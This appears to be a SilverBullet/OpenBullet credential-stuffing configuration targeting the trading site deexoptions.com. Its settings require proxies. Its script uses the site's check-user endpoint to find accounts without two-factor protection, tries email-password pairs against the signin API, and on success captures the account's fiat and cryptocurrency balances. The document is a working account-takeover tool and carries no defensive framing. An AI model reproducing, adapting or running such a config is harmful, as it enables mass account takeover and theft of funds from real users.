[SETTINGS]
{
  "Name": "deexoptions.com ",
  "SuggestedBots": 1,
  "MaxCPM": 0,
  "LastModified": "2026-02-12T22:12:56.0869344+03:00",
  "AdditionalInfo": "",
  "RequiredPlugins": [],
  "Author": "",
  "Version": "1.1.4 [SB]",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": true,
  "SaveHitsToTextFile": true,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "IsBase64": false,
  "FilterList": [],
  "EvaluateMathOCR": false,
  "SecurityProtocol": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "AcceptInsecureCertificates": true,
  "DisableNotifications": false,
  "DisableImageLoading": false,
  "DefaultProfileDirectory": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": "",
  "Title": "deexoptions",
  "IconPath": "Icon\\svbfile.ico",
  "LicenseSource": null,
  "Message": null,
  "MessageColor": "#FFFFFFFF",
  "HitInfoFormat": "[{hit.Type}][{hit.Proxy}] {hit.Data} - [{hit.CapturedString}]",
  "AuthorColor": "#FFFFB266",
  "WordlistColor": "#FFB5C2E1",
  "BotsColor": "#FFA8FFFF",
  "CustomInputColor": "#FFD6C7C7",
  "CPMColor": "#FFFFFFFF",
  "ProgressColor": "#FFAD93E3",
  "HitsColor": "#FF66FF66",
  "CustomColor": "#FFFFB266",
  "ToCheckColor": "#FF7FFFD4",
  "FailsColor": "#FFFF3333",
  "RetriesColor": "#FFFFFF99",
  "OcrRateColor": "#FF4698FD",
  "ProxiesColor": "#FFFFFFFF"
}

[SCRIPT]
FUNCTION GetRandomUA -> VAR "ua" 

REQUEST POST "https://backend-app.deexoptions.com/api/auth/check-user" AutoRedirect=FALSE 
  CONTENT "{\"email\":\"<USER>\"}" 
  CONTENTTYPE "application/json" 
  HEADER "User-Agent: <ua>" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

KEYCHECK 
  KEYCHAIN Success OR 
    KEY "{\"status\":\"success\",\"message\":\"User exists\",\"data\":{\"email2FA\":false,\"authApp2FA\":false" 
  KEYCHAIN Failure OR 
    KEY "{\"status\":\"fail\",\"message\":\"User not found\"}" 
    KEY "email2FA\":true" 
    KEY "authApp2FA\":true" 

REQUEST POST "https://backend-app.deexoptions.com/api/auth/signin" AutoRedirect=FALSE 
  CONTENT "{\"email\":\"<USER>\",\"password\":\"<PASS>\",\"deviceInfo\":{\"name\":\"Google Chrome\",\"uniqueId\":\"<ua>\",\"os\":\"Windows\"},\"rolePass\":\"user\"}" 
  CONTENTTYPE "application/json" 
  HEADER "User-Agent: <ua>" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

KEYCHECK 
  KEYCHAIN Success OR 
    KEY "\"message\":\"User signed in successfully\"" 
  KEYCHAIN Failure OR 
    KEY "{\"status\":\"fail\",\"message\":\"Incorrect password\"}" 

PARSE "<SOURCE>" JSON "usd" Recursive=TRUE CreateEmpty=FALSE -> CAP "usd" 

PARSE "<SOURCE>" JSON "ngn" Recursive=TRUE CreateEmpty=FALSE -> CAP "ngn" 

PARSE "<SOURCE>" JSON "eur" Recursive=TRUE CreateEmpty=FALSE -> CAP "eur" 

PARSE "<SOURCE>" JSON "usdt" Recursive=TRUE CreateEmpty=FALSE -> CAP "usdt" 

PARSE "<SOURCE>" JSON "btc" Recursive=TRUE CreateEmpty=FALSE -> CAP "btc" 

PARSE "<SOURCE>" JSON "eth" Recursive=TRUE CreateEmpty=FALSE -> CAP "eth" 

PARSE "<SOURCE>" JSON "doge" Recursive=TRUE CreateEmpty=FALSE -> CAP "doge" 

PARSE "<SOURCE>" JSON "shib" Recursive=TRUE CreateEmpty=FALSE -> CAP "shib" 

PARSE "<SOURCE>" JSON "trx" Recursive=TRUE CreateEmpty=FALSE -> CAP "trx" 

PARSE "<SOURCE>" JSON "sol" Recursive=TRUE CreateEmpty=FALSE -> CAP "sol" 

PARSE "<SOURCE>" JSON "usdc" Recursive=TRUE CreateEmpty=FALSE -> CAP "usdc" 

